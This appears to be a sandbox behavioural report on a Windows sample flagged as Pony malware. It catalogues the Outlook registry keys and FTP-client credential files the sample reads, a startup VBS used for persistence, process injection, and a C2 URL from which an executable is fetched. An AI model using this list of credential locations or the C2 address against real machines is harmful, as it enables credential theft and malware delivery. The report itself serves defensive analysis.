- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\HTTP Password
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 Server
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\IMAP User
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\POP3 Password2
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\IMAP Port
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\POP3 Port
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\HTTPMail Server
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\POP3 Port
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTP Server URL
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\NNTP User Name
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\IMAP Password
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTPMail User Name
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\HTTPMail Password2
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\NNTP Password
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP User Name
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\NNTP Password
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\IMAP Password2
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\IMAP User Name
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\NNTP Email Address
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP User
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP User Name
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTP Password
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\HTTPMail User Name
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\HTTP User
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\NNTP Server
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\HTTPMail User Name
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\HTTPMail User Name
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP User
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\NNTP Email Address
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\POP3 Port
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\NNTP Server
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\POP3 User
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\POP3 Server
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\IMAP Port
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 User Name
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\POP3 User
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP Password2
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\IMAP User
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP Password
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\IMAP Server
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Email Address
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP Server
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP Port
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP Password
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP Server
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\HTTP User
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP Port
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 Port
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\NNTP Server
- key: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
- key: HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts
- key: HKEY_CURRENT_USER\Identities\{141B4688-D8D4-4AD1-B583-99828374C040}\Software\Microsoft\Internet Account Manager\Accounts
Harvests credentials from local FTP client softwares
Severity: High
Confidence: Very High
- file: C:\Program Files (x86)\CuteFTP\sm.dat
- file: C:\Users\Seven01\AppData\Local\CuteFTP\sm.dat
- file: C:\Users\Seven01\AppData\Roaming\CuteFTP\sm.dat
- file: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\sm.dat
- file: C:\Users\Seven01\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.dat
- file: C:\ProgramData\CuteFTP\sm.dat
- file: C:\ProgramData\GlobalSCAPE\CuteFTP\sm.dat
- file: C:\Users\Seven01\AppData\Local\GlobalSCAPE\CuteFTP\sm.dat
- file: C:\Users\Seven01\AppData\Local\FlashFXP\4\Sites.dat
- file: C:\ProgramData\FlashFXP\3\Sites.dat
- file: C:\Users\Seven01\AppData\Roaming\FlashFXP\4\Sites.dat
- file: C:\ProgramData\FlashFXP\4\Sites.dat
- file: C:\Users\Seven01\AppData\Roaming\FlashFXP\3\Sites.dat
- file: C:\Users\Seven01\AppData\Local\FlashFXP\3\Sites.dat
- file: C:\Users\Seven01\AppData\Local\FlashFXP\3\Quick.dat
- file: C:\Users\Seven01\AppData\Roaming\FlashFXP\4\Quick.dat
- file: C:\ProgramData\FlashFXP\4\Quick.dat
- file: C:\Users\Seven01\AppData\Roaming\FlashFXP\3\Quick.dat
- file: C:\Users\Seven01\AppData\Local\FlashFXP\4\Quick.dat
- file: C:\ProgramData\FlashFXP\3\Quick.dat
- file: C:\Users\Seven01\AppData\Roaming\FileZilla\sitemanager.xml
- file: C:\Users\Seven01\AppData\Local\FileZilla\sitemanager.xml
- file: C:\ProgramData\FileZilla\sitemanager.xml
- file: C:\Users\Seven01\AppData\Roaming\FileZilla\recentservers.xml
- file: C:\Users\Seven01\AppData\Local\FileZilla\recentservers.xml
- file: C:\ProgramData\FileZilla\recentservers.xml
- file: C:\ProgramData\VanDyke\Config\Sessions\*.*
- file: C:\Users\Seven01\AppData\Roaming\VanDyke\Config\Sessions\*.*
- file: C:\Users\Seven01\AppData\Local\VanDyke\Config\Sessions\*.*
- file: C:\ProgramData\FTP Explorer\*.*
- file: C:\Users\Seven01\AppData\Local\FTP Explorer\*.*
- file: C:\Users\Seven01\AppData\Roaming\FTP Explorer\*.*
- file: C:\Users\Seven01\AppData\Local\SmartFTP\*.*
- file: C:\Users\Seven01\AppData\Roaming\SmartFTP\*.*
- file: C:\ProgramData\SmartFTP\*.*
- file: C:\Users\Seven01\AppData\Local\TurboFTP\*.*
- file: C:\ProgramData\TurboFTP\*.*
- file: C:\Users\Seven01\AppData\Roaming\TurboFTP\*.*
- file: C:\ProgramData\FTPRush\*.*
- file: C:\Users\Seven01\AppData\Local\FTPRush\*.*
- file: C:\Users\Seven01\AppData\Roaming\FTPRush\*.*
- file: C:\Users\Seven01\AppData\Roaming\LeapWare\LeapFTP\*.*
- file: C:\Users\Seven01\AppData\Local\LeapWare\LeapFTP\*.*
- file: C:\ProgramData\LeapWare\LeapFTP\*.*
- file: C:\Users\Seven01\AppData\Local\FTPGetter\*.*
- file: C:\ProgramData\FTPGetter\*.*
- file: C:\Users\Seven01\AppData\Roaming\FTPGetter\*.*
- file: C:\Users\Seven01\AppData\Local\Estsoft\ALFTP\*.*
- file: C:\ProgramData\Estsoft\ALFTP\*.*
- file: C:\Users\Seven01\AppData\Roaming\Estsoft\ALFTP\*.*
- file: C:\Program Files (x86)\Common Files\Ipswitch\WS_FTP\*.*
- key: HKEY_CURRENT_USER\Software\Far Manager\Plugins\FTP\Hosts
- key: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
- key: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
- key: HKEY_CURRENT_USER\Software\Far\SavedDialogHistory\FTPHost
- key: HKEY_CURRENT_USER\Software\Far2\SavedDialogHistory\FTPHost
- key: HKEY_CURRENT_USER\Software\Far Manager\SavedDialogHistory\FTPHost
- key: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
- key: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
- key: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
- key: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
- key: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
- key: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
- key: HKEY_LOCAL_MACHINE\Software\Ghisler\Windows Commander
- key: HKEY_CURRENT_USER\Software\Ghisler\Windows Commander
- key: HKEY_CURRENT_USER\Software\Ghisler\Total Commander
- key: HKEY_LOCAL_MACHINE\Software\Ghisler\Total Commander
- key: HKEY_CURRENT_USER\Software\BPFTP\Bullet Proof FTP\Options
- key: HKEY_CURRENT_USER\Software\BPFTP\Bullet Proof FTP\Main
- key: HKEY_CURRENT_USER\Software\FileZilla
- key: HKEY_LOCAL_MACHINE\Software\FileZilla
- key: HKEY_CURRENT_USER\Software\FileZilla Client
- key: HKEY_LOCAL_MACHINE\Software\FileZilla Client
- key: HKEY_CURRENT_USER\Software\TurboFTP
- key: HKEY_LOCAL_MACHINE\Software\TurboFTP
- key: HKEY_CURRENT_USER\Software\Sota\FFFTP\Options
- key: HKEY_CURRENT_USER\Software\Sota\FFFTP
- key: HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites
- key: HKEY_CURRENT_USER\Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
- key: HKEY_CURRENT_USER\Software\FTP Explorer\Profiles
- key: HKEY_LOCAL_MACHINE\Software\FTPClient\Sites
- key: HKEY_CURRENT_USER\Software\FTPClient\Sites
- key: HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
- key: HKEY_LOCAL_MACHINE\SOFTWARE\Robo-FTP 3.7\Scripts
- key: HKEY_LOCAL_MACHINE\SOFTWARE\Robo-FTP 3.7\FTPServers
- key: HKEY_CURRENT_USER\SOFTWARE\Robo-FTP 3.7\FTPServers
- key: HKEY_CURRENT_USER\SOFTWARE\Robo-FTP 3.7\Scripts
- key: HKEY_CURRENT_USER\Software\MAS-Soft\FTPInfo\Setup
- key: HKEY_LOCAL_MACHINE\Software\SoftX.org\FTPClient\Sites
- key: HKEY_CURRENT_USER\Software\SoftX.org\FTPClient\Sites
- key: HKEY_CURRENT_USER\Software\BulletProof Software\BulletProof FTP Client\Main
- key: HKEY_CURRENT_USER\Software\BulletProof Software\BulletProof FTP Client\Options
Drops a binary and executes it
Severity: High
Confidence: Medium
- binary: C:\Users\Seven01\AppData\Local\Temp\15757203.exe
Collects information about installed applications
Severity: High
Confidence: Very Low
- Program: Python 2.7.10
- Program: Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005
- Program: Microsoft Visual C++ 2005 Redistributable
- Program: Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.7523
- Program: Adobe Shockwave Player 12.2
- Program: Microsoft Visual C++ 2012 Redistributable - 11.0.61030
- Program: Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219
- Program: Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005
- Program: Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030
- Program: Adobe Reader XI
- Program: Microsoft Visual C++ 2015 x86 Minimum Runtime - 14.0.23506
- Program: Microsoft Visual C++ 2015 Redistributable - 14.0.23506
- Program: Java 8 Update 74
- Program: Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030
- Program: Microsoft Visual C++ 2015 x86 Additional Runtime - 14.0.23506
- Program: Microsoft Visual C++ 2013 Redistributable - 12.0.30501
- Program: Adobe Flash Player 20 ActiveX
- Program: Python 2.7 Pillow-2.9.0
- Program: Adobe Flash Player 20 NPAPI
- Program: Java 6 Update 22
Exhibits behavior characteristic of Pony malware
Severity: High
Confidence: Very High
- C2: http://nwheilcopters.com/chuksjamil/shit.exe
Installs itself for autorun at Windows startup
Severity: High
Confidence: Very High
- file: C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\filename.vbs
- file: C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\filename.vbs
Deletes its original binary from disk
Severity: High
Confidence: Very High
Executed a process and injected code into it, probably while unpacking
Severity: High
Confidence: Very High
- Injection: filename.exe(2356) -> filename.exe(2756)
Performs some HTTP requests
Severity: Medium
Confidence: Low
- url: http://nwheilcopters.com/chuksjamil/shit.exe
HTTP traffic contains suspicious features which may be indicative of malware related traffic
Severity: Medium
Confidence: Low
- http_version_old: HTTP traffic uses version 1.0
- suspicious_request: http://nwheilcopters.com/chuksjamil/shit.exe
A process created a hidden window
Severity: Medium
Confidence: Very High
- Process: filename.exe -> C:\Users\Seven01\AppData\Local\Temp\15759062.bat
Reads data out of its own binary image
Severity: Medium
Confidence: Low
- self_read: process: filename.exe, pid: 2356, offset: 0x00000000, length: 0x00039000
Possible date expiration check, exits too soon after checking local time
Severity: Medium
Confidence: Medium
- process: filename.exe, PID 2756
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
2018-01-14 22:43:04 | 2018-01-14 22:43:04 |
10 Summary items with data
Files
\Device\KsecDD C:\Users\Seven01\AppData\Local\Temp\filename.exe.cfg C:\Windows\sysnative\C_932.NLS C:\Windows\sysnative\C_949.NLS C:\Windows\sysnative\C_950.NLS C:\Windows\sysnative\C_936.NLS C:\Windows\Fonts\staticcache.dat C:\Users\Seven01\AppData\Roaming C:\Users C:\Users\Seven01 C:\Users\Seven01\AppData C:\Users\Seven01\AppData\Roaming\subfolder C:\Windows\SysWOW64\shell32.dll C:\Users\Seven01\AppData\Local\Temp\filename.exe C:\Users\Seven01\AppData\Roaming\subfolder\filename.exe C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\filename.vbs C:\Windows\Globalization\Sorting\sortdefault.nls C:\Users\Seven01\AppData\Local\Temp\HWID C:\Windows\wcx_ftp.ini C:\Users\Seven01\wcx_ftp.ini C:\Users\Seven01\AppData\Roaming\GHISLER\wcx_ftp.ini C:\ProgramData\GHISLER\wcx_ftp.ini C:\Users\Seven01\AppData\Local\GHISLER\wcx_ftp.ini C:\Windows\win.ini C:\Program Files (x86)\Common Files\Ipswitch\WS_FTP\*.* C:\Users\Seven01\AppData\Roaming\Ipswitch\*.* C:\ProgramData\Ipswitch\*.* C:\Users\Seven01\AppData\Local\Ipswitch\*.* C:\Users\Seven01\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.dat C:\Users\Seven01\AppData\Roaming\GlobalSCAPE\CuteFTP\*.* C:\Users\Seven01\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\sm.dat C:\Users\Seven01\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\*.* C:\Users\Seven01\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\sm.dat C:\Users\Seven01\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\*.* C:\Users\Seven01\AppData\Roaming\CuteFTP\sm.dat C:\Users\Seven01\AppData\Roaming\CuteFTP\*.* C:\ProgramData\GlobalSCAPE\CuteFTP\sm.dat C:\ProgramData\GlobalSCAPE\CuteFTP\*.* C:\ProgramData\GlobalSCAPE\CuteFTP Pro\sm.dat C:\ProgramData\GlobalSCAPE\CuteFTP Pro\*.* C:\ProgramData\GlobalSCAPE\CuteFTP Lite\sm.dat C:\ProgramData\GlobalSCAPE\CuteFTP Lite\*.* C:\ProgramData\CuteFTP\sm.dat C:\ProgramData\CuteFTP\*.* C:\Users\Seven01\AppData\Local\GlobalSCAPE\CuteFTP\sm.dat C:\Users\Seven01\AppData\Local\GlobalSCAPE\CuteFTP\*.* C:\Users\Seven01\AppData\Local\GlobalSCAPE\CuteFTP Pro\sm.dat C:\Users\Seven01\AppData\Local\GlobalSCAPE\CuteFTP Pro\*.* C:\Users\Seven01\AppData\Local\GlobalSCAPE\CuteFTP Lite\sm.dat C:\Users\Seven01\AppData\Local\GlobalSCAPE\CuteFTP Lite\*.* C:\Users\Seven01\AppData\Local\CuteFTP\sm.dat C:\Users\Seven01\AppData\Local\CuteFTP\*.* C:\Program Files (x86)\GlobalSCAPE\CuteFTP\sm.dat C:\Program Files (x86)\GlobalSCAPE\CuteFTP\*.* C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\sm.dat C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\*.* C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\sm.dat C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\*.* C:\Program Files (x86)\CuteFTP\sm.dat C:\Program Files (x86)\CuteFTP\*.* C:\Users\Seven01\AppData\Roaming\FlashFXP\3\Sites.dat C:\Users\Seven01\AppData\Roaming\FlashFXP\4\Sites.dat C:\Users\Seven01\AppData\Roaming\FlashFXP\3\Quick.dat C:\Users\Seven01\AppData\Roaming\FlashFXP\4\Quick.dat C:\Users\Seven01\AppData\Roaming\FlashFXP\3\History.dat C:\Users\Seven01\AppData\Roaming\FlashFXP\4\History.dat C:\ProgramData\FlashFXP\3\Sites.dat C:\ProgramData\FlashFXP\4\Sites.dat C:\ProgramData\FlashFXP\3\Quick.dat C:\ProgramData\FlashFXP\4\Quick.dat C:\ProgramData\FlashFXP\3\History.dat C:\ProgramData\FlashFXP\4\History.dat C:\Users\Seven01\AppData\Local\FlashFXP\3\Sites.dat C:\Users\Seven01\AppData\Local\FlashFXP\4\Sites.dat C:\Users\Seven01\AppData\Local\FlashFXP\3\Quick.dat C:\Users\Seven01\AppData\Local\FlashFXP\4\Quick.dat C:\Users\Seven01\AppData\Local\FlashFXP\3\History.dat C:\Users\Seven01\AppData\Local\FlashFXP\4\History.dat C:\Users\Seven01\AppData\Roaming\FileZilla\sitemanager.xml C:\Users\Seven01\AppData\Roaming\FileZilla\recentservers.xml C:\Users\Seven01\AppData\Roaming\FileZilla\filezilla.xml C:\ProgramData\FileZilla\sitemanager.xml C:\ProgramData\FileZilla\recentservers.xml C:\ProgramData\FileZilla\filezilla.xml C:\Users\Seven01\AppData\Local\FileZilla\sitemanager.xml C:\Users\Seven01\AppData\Local\FileZilla\recentservers.xml C:\Users\Seven01\AppData\Local\FileZilla\filezilla.xml C:\Users\Seven01\AppData\Local\BulletProof Software\*.* C:\Users\Seven01\AppData\Roaming\BulletProof Software\*.* C:\ProgramData\BulletProof Software\*.* C:\Users\Seven01\AppData\Roaming\SmartFTP\*.* C:\ProgramData\SmartFTP\*.* C:\Users\Seven01\AppData\Local\SmartFTP\*.* C:\Users\Seven01\AppData\Roaming\TurboFTP\*.* C:\ProgramData\TurboFTP\*.* C:\Users\Seven01\AppData\Local\TurboFTP\*.* C:\Users\Seven01\AppData\Roaming\FTP Explorer\*.* C:\ProgramData\FTP Explorer\*.* C:\Users\Seven01\AppData\Local\FTP Explorer\*.* C:\Users\Seven01\AppData\Roaming\Frigate3\*.* C:\ProgramData\Frigate3\*.* C:\Users\Seven01\AppData\Local\Frigate3\*.* C:\Users\Seven01\AppData\Roaming\VanDyke\Config\Sessions\*.* C:\ProgramData\VanDyke\Config\Sessions\*.* C:\Users\Seven01\AppData\Local\VanDyke\Config\Sessions\*.* C:\Users\Seven01\AppData\Roaming\FTPRush\*.* C:\ProgramData\FTPRush\*.* C:\Users\Seven01\AppData\Local\FTPRush\*.* C:\Users\Seven01\AppData\Roaming\BitKinex\*.* C:\ProgramData\BitKinex\*.* C:\Users\Seven01\AppData\Local\BitKinex\*.* C:\Users\Seven01\AppData\Roaming\ExpanDrive\drives.js C:\Users\Seven01\AppData\Local\ExpanDrive\drives.js C:\ProgramData\ExpanDrive\drives.js C:\Users\Seven01\AppData\Roaming\GPSoftware\Directory Opus\*.* C:\ProgramData\GPSoftware\Directory Opus\*.* C:\Users\Seven01\AppData\Local\GPSoftware\Directory Opus\*.* C:\Users\Seven01\AppData\Roaming\SharedSettings.ccs C:\Users\Seven01\AppData\Roaming\SharedSettings.sqlite C:\Users\Seven01\AppData\Roaming\SharedSettings_1_0_5.ccs C:\Users\Seven01\AppData\Roaming\SharedSettings_1_0_5.sqlite C:\ProgramData\SharedSettings.ccs C:\ProgramData\SharedSettings.sqlite C:\ProgramData\SharedSettings_1_0_5.ccs C:\ProgramData\SharedSettings_1_0_5.sqlite C:\Users\Seven01\AppData\Local\SharedSettings.ccs C:\Users\Seven01\AppData\Local\SharedSettings.sqlite C:\Users\Seven01\AppData\Local\SharedSettings_1_0_5.ccs C:\Users\Seven01\AppData\Local\SharedSettings_1_0_5.sqlite C:\Users\Seven01\AppData\Roaming\CoffeeCup Software\SharedSettings.ccs C:\Users\Seven01\AppData\Roaming\CoffeeCup Software\SharedSettings.sqlite C:\Users\Seven01\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.ccs C:\Users\Seven01\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.sqlite C:\ProgramData\CoffeeCup Software\SharedSettings.ccs C:\ProgramData\CoffeeCup Software\SharedSettings.sqlite C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.ccs C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.sqlite C:\Users\Seven01\AppData\Local\CoffeeCup Software\SharedSettings.ccs C:\Users\Seven01\AppData\Local\CoffeeCup Software\SharedSettings.sqlite C:\Users\Seven01\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.ccs C:\Users\Seven01\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.sqlite C:\Users\Seven01\AppData\Roaming\LeapWare\LeapFTP\*.* C:\ProgramData\LeapWare\LeapFTP\*.* C:\Users\Seven01\AppData\Local\LeapWare\LeapFTP\*.* C:\Windows\32BitFtp.ini C:\Users\Seven01\AppData\Roaming\NetDrive\*.* C:\ProgramData\NetDrive\*.* C:\Users\Seven01\AppData\Local\NetDrive\*.* C:\Users\Seven01\AppData\Roaming\*.* C:\ProgramData\*.* C:\Users\Seven01\AppData\Local\*.* C:\Users\Seven01\AppData\Roaming\AceBIT\*.* C:\ProgramData\AceBIT\*.* C:\Users\Seven01\AppData\Local\AceBIT\*.* C:\Users\Seven01\AppData\Roaming\RhinoSoft.com\*.* 